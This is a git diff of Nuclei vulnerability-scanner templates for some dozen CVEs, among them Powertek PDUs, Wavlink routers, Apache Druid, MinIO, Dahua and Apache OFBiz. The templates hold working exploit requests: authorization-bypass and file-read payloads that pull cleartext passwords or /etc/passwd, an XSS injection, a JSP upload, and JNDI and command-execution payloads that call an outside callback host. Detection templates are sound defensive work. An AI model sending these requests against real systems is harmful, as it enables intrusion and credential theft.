b/nuclei-templates/CVE-2022/cve-2022-33174.yaml new file mode 100644 index 0000000000..6bd02c9441 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-33174.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-33174 + +info: + name: Powertek Firmware <3.30.30 - Authorization Bypass + author: pikpikcu + severity: high + description: | + Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Powertek Firmware, potentially leading to further compromise of the system. + remediation: | + Upgrade the Powertek Firmware to version 3.30.30 or higher to mitigate the vulnerability. + reference: + - https://gynvael.coldwind.pl/?lang=en&id=748 + - https://nvd.nist.gov/vuln/detail/CVE-2022-33174 + - https://github.com/Henry4E36/CVE-2022-33174 + - https://github.com/k0mi-tg/CVE-POC + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-33174 + cwe-id: CWE-863 + epss-score: 0.01241 + epss-percentile: 0.85189 + cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: powertekpdus + product: basic_pdu_firmware + shodan-query: http.html:"Powertek" + tags: cve2022,cve,powertek,auth-bypass,powertekpdus + +http: + - raw: + - | + GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1 + Host: {{Hostname}} + Cookie: tmpToken=; + + matchers-condition: and + matchers: + - type: word + words: + - '<sys.passwd>' + - '<sys.su.name>' + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - '<sys\.passwd>([A-Z0-9a-z]+)<\/sys\.passwd>' + - '<sys\.su\.name>([a-z]+)<\/sys\.su\.name>' + part: body +# digest: 490a0046304402205f3721d4d1cc1bd01d55480d74005f566999d1eb1f7aef883abe68afa60e1d4102202cd3dede0c67c2903cde37b3f54d432dcbb537f4bfb2e29d4ee779cac0609d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-34046.yaml b/nuclei-templates/CVE-2022/cve-2022-34046.yaml new file mode 100644 index 0000000000..b1060a2f78 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-34046.yaml @@ -0,0 +1,58 @@ +id: CVE-2022-34046 + +info: + name: WAVLINK WN533A8 - Improper Access Control + author: For3stCo1d + severity: high + description: | + WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the entire network. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. + reference: + - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046 + - http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-34046 + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-34046 + cwe-id: CWE-863 + epss-score: 0.14292 + epss-percentile: 0.95577 + cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn533a8_firmware + shodan-query: http.title:"Wi-Fi APP Login" + tags: cve,cve2022,packetstorm,wavlink,router,exposure + +http: + - raw: + - | + GET /sysinit.shtml?r=52300 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'var syspasswd="' + - '<title>APP' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + regex: + - 'syspasswd="(.+?)"' +# digest: 4a0a004730450220012d32e7af94355d9d79d3210f97d2bdf114e7d81c8a425f14611b6898afdcb2022100d2e6dd7fe5b5f462e9bccc0179f3417fa34f94d1006498add8171cba0ec4af4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-34048.yaml b/nuclei-templates/CVE-2022/cve-2022-34048.yaml deleted file mode 100644 index cd377ce7c0..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-34048.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2022-34048 - -info: - name: Wavlink WN-533A8 - Cross-Site Scripting - author: ritikchaddha - severity: medium - description: | - Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest firmware update provided by the vendor to mitigate this vulnerability. - reference: - - https://www.exploit-db.com/exploits/50989 - - https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing - - https://drive.google.com/file/d/1NI3-k3AGIsSe2zjeigl1GVyU1VpG1SV3/view?usp=sharing - - https://nvd.nist.gov/vuln/detail/CVE-2022-34048 - - https://github.com/ARPSyndicate/cvemon - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-34048 - cwe-id: CWE-79 - epss-score: 0.00107 - epss-percentile: 0.43187 - cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: wavlink - product: wn533a8_firmware - shodan-query: http.html:"Wavlink" - tags: cve2022,cve,wavlink,xss,router,edb - -http: - - raw: - - | - POST /cgi-bin/login.cgi HTTP/1.1 - Host: {{Hostname}} - - newUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x");alert(9);x=("&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'x");alert(9);x=("?login=0");' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# digest: 4a0a004730450220517ca1dce8d4d311ecbc72009be25a53b0ccf3bcc93670f195b5f037608dfef0022100e45d38b599b8695586de222b078c5ebb059c93246d3d687afc08bf6e5710226a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-35416.yaml b/nuclei-templates/CVE-2022/cve-2022-35416.yaml deleted file mode 100644 index 0db605cff6..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-35416.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: CVE-2022-35416 - -info: - name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting - author: 0x240x23elu - severity: medium - description: | - H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. - remediation: | - Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability. - reference: - - https://github.com/advisories/GHSA-9x76-78gc-r3m9 - - https://github.com/Docker-droid/H3C_SSL_VPN_XSS - - https://nvd.nist.gov/vuln/detail/CVE-2022-35416 - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/bughunter0xff/recon-scanner - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-35416 - cwe-id: CWE-79 - epss-score: 0.00088 - epss-percentile: 0.36353 - cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: h3c - product: ssl_vpn - shodan-query: http.html_hash:510586239 - tags: cve,cve2022,xss,vpn,h3c - -http: - - raw: - - | - GET /wnm/login/login.json HTTP/1.1 - Host: {{Hostname}} - Cookie: svpnlang= - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 -# digest: 4a0a00473045022074bce49d1d622adb10be0856ef209bacb28fb427de7f38f426069ca664b036d9022100b2466c1b44507b4b58e6f7e6ee4ab7221f9307198493e54f23ca95f1fcfc9e73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-24044.yaml b/nuclei-templates/CVE-2023/CVE-2023-24044.yaml new file mode 100644 index 0000000000..0a2696716b --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-24044.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-24044 + +info: + name: Plesk Obsidian - Host Header Injection + author: pikpikcu + severity: medium + description: | + A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-24044 + - https://portswigger.net/web-security/host-header/exploiting + - https://medium.com/@jetnipat.tho/cve-2023-24044-10e48ab940d8 + - https://gist.github.com/TJetnipat/02b3854543b7ec95d54a8de811f2e8ae + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-24044 + cwe-id: CWE-601 + metadata: + fofa-query: title="Plesk Obsidian" + shodan-query: title:"Plesk Obsidian" + verified: "true" + tags: cve,cve2023,header,injection,plesk,obsidian + +requests: + - method: GET + path: + - "{{BaseURL}}/login.php" + + headers: + Host: "evil.com" + + matchers-condition: and + matchers: + - type: word + part: location + words: + - 'https://evil.com/login_up.php' + + - type: status + status: + - 303 diff --git a/nuclei-templates/CVE-2023/CVE-2023-25194.yaml b/nuclei-templates/CVE-2023/CVE-2023-25194.yaml new file mode 100644 index 0000000000..344fe9f3b0 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-25194.yaml @@ -0,0 +1,99 @@ +id: CVE-2023-25194 + +info: + name: Apache Druid Kafka Connect - Remote Code Execution + author: j4vaovo + severity: high + description: | + The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194 + - https://nvd.nist.gov/vuln/detail/CVE-2023-25194 + - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce + - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html + - https://kafka.apache.org/cve-list + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-25194 + cwe-id: CWE-502 + epss-score: 0.91608 + epss-percentile: 0.98695 + cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: apache + product: kafka_connect + shodan-query: html:"Apache Druid" + tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast + +http: + - raw: + - | + POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "type":"kafka", + "spec":{ + "type":"kafka", + "ioConfig":{ + "type":"kafka", + "consumerProperties":{ + "bootstrap.servers":"127.0.0.1:6666", + "sasl.mechanism":"SCRAM-SHA-256", + "security.protocol":"SASL_SSL", + "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" + }, + "topic":"test", + "useEarliestOffset":true, + "inputFormat":{ + "type":"regex", + "pattern":"([\\s\\S]*)", + "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965", + "columns":[ + "raw" + ] + } + }, + "dataSchema":{ + "dataSource":"sample", + "timestampSpec":{ + "column":"!!!_no_such_column_!!!", + "missingValue":"1970-01-01T00:00:00Z" + }, + "dimensionsSpec":{ + + }, + "granularitySpec":{ + "rollup":false + } + }, + "tuningConfig":{ + "type":"kafka" + } + }, + "samplerConfig":{ + "numRows":500, + "timeoutMs":15000 + } + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - 'RecordSupplier' + + - type: status + status: + - 400 +# digest: 4a0a004730450220253e393d9460c536f32f54253122a4cbfbbb890af4cd35b91b95d10e1b94d6b8022100e0a025041c041e62a80292747511e4d1af8e4adbe51386321a14466077c090aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-28432.yaml b/nuclei-templates/CVE-2023/CVE-2023-28432.yaml index aba88864c4..19839d49a6 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-28432.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-28432.yaml @@ -1,21 +1,38 @@ id: CVE-2023-28432 + info: - name: Minio post policy request security bypass + name: MinIO Cluster Deployment - Information Disclosure author: Mr-xn severity: high - description: Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. + description: | + MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted. + impact: | + An attacker can gain unauthorized access to sensitive information stored in the MinIO cluster. + remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. reference: - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q - https://github.com/minio/minio/pull/16853/files - https://github.com/golang/vulndb/issues/1667 - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json + - https://nvd.nist.gov/vuln/detail/CVE-2023-28432 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-28432 - cwe-id: CWE-200 - tags: cve,cve2023, -requests: + cwe-id: CWE-200,NVD-CWE-noinfo + epss-score: 0.14173 + epss-percentile: 0.95219 + cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: minio + product: minio + shodan-query: title:"Minio Console" + fofa-query: app="Minio" + tags: cve,cve2023,minio,console,exposure,kev + +http: - raw: - |+ POST /minio/bootstrap/v1/verify HTTP/1.1 @@ -27,11 +44,17 @@ requests: - type: word part: body words: - - '"MinioEndpoints"' + - '"MINIO_ROOT_PASSWORD":' + - '"MINIO_ROOT_USER":' + - '"MinioEnv":' + condition: or + - type: word part: header words: - - 'Content-Type: text/plain' + - 'text/plain' + - type: status status: - 200 +# digest: 4a0a00473045022100cc34538c0cf40fb3489d8f091c41bcf45f66c43266a4c6a2136aef40acbe67b702200d93d6082e5e272bc01f1e8222ec9521c32be40f912837b32aa6c0e6dcd75a2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-33510.yaml b/nuclei-templates/CVE-2023/CVE-2023-33510.yaml new file mode 100644 index 0000000000..cd7f863611 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-33510.yaml @@ -0,0 +1,50 @@ +id: CVE-2023-33510 + +info: + name: Jeecg P3 Biz Chat - Local File Inclusion + author: DhiyaneshDK + severity: high + description: | + Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. + remediation: | + Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in Jeecg P3 Biz Chat. + reference: + - https://twitter.com/momika233/status/1670701256535572481 + - https://carl1l.github.io/2023/05/08/jeecg-p3-biz-chat-1-0-5-jar-has-arbitrary-file-read-vulnerability/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33510 + - https://github.com/izj007/wechat + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-33510 + cwe-id: CWE-668 + epss-score: 0.00347 + epss-percentile: 0.6879 + cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:* + metadata: + verified: "true" + max-request: 1 + vendor: jeecg_p3_biz_chat_project + product: jeecg_p3_biz_chat + framework: wordpress + shodan-query: http.favicon.hash:1380908726 + tags: cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress + +http: + - method: GET + path: + - "{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4b0a004830460221009e162dbb1787d5c8b032abe3bf70bb51a039c53b2df9c8e71d5971b297d962bb0221009b98beb3b2add0df90bddc57c9ed57f15adc1f361360d012658f5c9e2265d724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-34020.yaml b/nuclei-templates/CVE-2023/CVE-2023-34020.yaml deleted file mode 100644 index 823a82a3bb..0000000000 --- a/nuclei-templates/CVE-2023/CVE-2023-34020.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2023-34020 - -info: - name: Uncanny Toolkit for LearnDash - Open Redirection - author: LeDoubleTake - severity: low - description: | - A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security. - reference: - - https://patchstack.com/database/vulnerability/uncanny-learndash-toolkit/wordpress-uncanny-toolkit-for-learndash-plugin-3-6-4-3-open-redirection-vulnerability - - https://wordpress.org/plugins/uncanny-learndash-toolkit/ - metadata: - verified: true - max-request: 1 - publicwww-query: "/wp-content/plugins/uncanny-learndash-toolkit/" - tags: cve2023,cve,wordpress,uncanny-learndash-toolkit,wpscan,redirect - -http: - - method: GET - path: - - "{{BaseURL}}/?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://interact.sh" - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100863feeb025ff903aec139893d251ec1fb6d2afd5b5817e69dba4be2f8939696902201d851c543d8c5013957bc626be07c2d192201385d1a8f3ab7505696dc02b13e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-3836.yaml b/nuclei-templates/CVE-2023/CVE-2023-3836.yaml new file mode 100644 index 0000000000..15102a7d50 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-3836.yaml @@ -0,0 +1,69 @@ +id: CVE-2023-3836 + +info: + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical + description: | + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. + reference: + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.8996 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" + +http: + - raw: + - | + POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Host: {{Hostname}} + + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- + - | + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + + extractors: + - type: regex + name: shell_filename + internal: true + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' + +# digest: 490a004630440220513bc76e8fde9982cfc588703d87e942603b15129e6d1906581bc35025ca7b3302203f4fa642d000d9b4736b3ac12bff77ec4b02cc55b50fa42350a2ce552d65b6e4:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/CVE_2023_49442.yaml b/nuclei-templates/CVE-2023/CVE-2023-49442.yaml similarity index 100% rename from nuclei-templates/Other/CVE_2023_49442.yaml rename to nuclei-templates/CVE-2023/CVE-2023-49442.yaml diff --git a/nuclei-templates/CVE-2023/CVE-2023-51467.yaml b/nuclei-templates/CVE-2023/CVE-2023-51467.yaml new file mode 100644 index 0000000000..85d9a58b5f --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-51467.yaml @@ -0,0 +1,51 @@ +id: CVE-2023-51467 + +info: + name: Apache OFBiz < 18.12.11 - Remote Code Execution + author: your3cho + severity: critical + description: | + The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF) + reference: + - https://lists.apache.org/thread/9tmf9qyyhgh6m052rhz7lg9vxn390bdv + - https://www.openwall.com/lists/oss-security/2023/12/26/3 + - https://twitter.com/_0xf4n9x_/status/1740202435367543183 + - https://nvd.nist.gov/vuln/detail/CVE-2023-51467 + - https://issues.apache.org/jira/browse/OFBIZ-12873 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-51467 + cwe-id: CWE-918 + epss-score: 0.54475 + epss-percentile: 0.97354 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: ofbiz + shodan-query: html:"OFBiz" + fofa-query: app="Apache_OFBiz" + tags: cve2023,cve,apache,ofbiz,rce + +http: + - raw: + - | + POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + groovyProgram=import+groovy.lang.GroovyShell%3B%0A%0AString+expression+%3D+%22'nslookup+{{interactsh-url}}'.execute()%22%3B%0AGroovyShell+gs+%3D+new+GroovyShell()%3B%0Ags.evaluate(expression)%3B + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: header + words: + - 'OFBiz.Visitor=' +# digest: 4a0a004730450220639d50bb1c136f51bd9616ed67f1f2c99a8efc2e9df5055de966eb1d82f2b226022100e4a0f05b2ba7aea008f99b826c6ca3db2e89f7d5208f3dabcc18c8b862897c32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git "a/nuclei-templates/CVE-2023/CVE-2023\342\200\22324044.yaml" "b/nuclei-templates/CVE-2023/CVE-2023\342\200\22324044.yaml" deleted file mode 100644 index 5661dadb7d..0000000000 --- "a/nuclei-templates/CVE-2023/CVE-2023\342\200\22324044.yaml" +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2023-24044 - -info: - name: Plesk Obsidian <=18.0.49 - Open Redirect - author: pikpikcu - severity: medium - description: | - Plesk Obsidian through 18.0.49 contains an open redirect vulnerability via the login page. An attacker can redirect users to malicious websites via a host request header and thereby access user credentials and execute unauthorized operations. NOTE: The vendor's position is "the ability to use arbitrary domain names to access the panel is an intended feature." - impact: | - Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. - remediation: | - Upgrade Plesk Obsidian to a version higher than 18.0.49 to mitigate the vulnerability. - reference: - - https://portswigger.net/web-security/host-header/exploiting - - https://medium.com/@jetnipat.tho/cve-2023-24044-10e48ab940d8 - - https://gist.github.com/TJetnipat/02b3854543b7ec95d54a8de811f2e8ae - - https://nvd.nist.gov/vuln/detail/CVE-2023-24044 - - https://support.plesk.com/hc/en-us/articles/10254625170322-Vulnerability-CVE-2023-24044 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2023-24044 - cwe-id: CWE-601 - epss-score: 0.00155 - epss-percentile: 0.51774 - cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: plesk - product: obsidian - shodan-query: title:"Plesk Obsidian" - fofa-query: title="Plesk Obsidian" - tags: cve2023,cve,header,injection,plesk,obsidian - -http: - - method: GET - path: - - "{{BaseURL}}/login.php" - - headers: - Host: "evil.com" - - matchers-condition: and - matchers: - - type: word - part: location - words: - - 'https://evil.com/login_up.php' - - - type: status - status: - - 303 -# digest: 4a0a00473045022069dc022651b4fb9af6a01bd55d548680f03edd9debffa187316d1b018f1209cc022100c92c5328721c039369314c3c7035951e413c56f1862f781e9d73bac65cfa6719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-0012.yaml b/nuclei-templates/CVE-2024/CVE-2024-0012.yaml index 53c6f6039f..513d836bd0 100644 --- a/nuclei-templates/CVE-2024/CVE-2024-0012.yaml +++ b/nuclei-templates/CVE-2024/CVE-2024-0012.yaml @@ -44,3 +44,4 @@ http: - 'contains(header, "PHPSESSID=")' - 'status_code == 200' condition: and +# digest: 4b0a00483046022100ca0502603214b47d45e7402e4ef79840d87e1989598554b1a8096f25ebb12396022100a4cd2cae49d7d0e115f5e93732d377067206f41f33e795ec69a1cdf2d5021a2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-0195.yaml b/nuclei-templates/CVE-2024/CVE-2024-0195.yaml deleted file mode 100644 index 928e611dad..0000000000 --- a/nuclei-templates/CVE-2024/CVE-2024-0195.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2024-0195 - -info: - name: SpiderFlow爬虫平台RCE漏洞 - author: pipichen - severity: critical - description: SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发,因此收到很多人的喜欢,在gitee上有7.4K Star。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。 - metadata: - max-request: 1 - fofa-query: app="SpiderFlow" - verified: true - tags: cve,rce,others -requests: - - raw: - - |+ - POST /function/save HTTP/1.1 - Host: {{Hostname}} - Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Accept: */* - Accept-Encoding: gzip, deflate - X-Requested-With: XMLHttpRequest - - id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B - - matchers: - - type: dsl - dsl: - - contains(interactsh_protocol, "dns") - condition: and -# digest: 4b0a00483046022100e6a1c51d9a3a25fc7a276bd9db3e68b3a9e9181be638bd0dbb4ce279e793f5c3022100a0f31cd5a1de4091f43018a3b6f4eae65d7a78309d12eea7930cdde047d29918:6b2dd5af372f02ed15a56faf8ad98cf9 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-1183.yaml 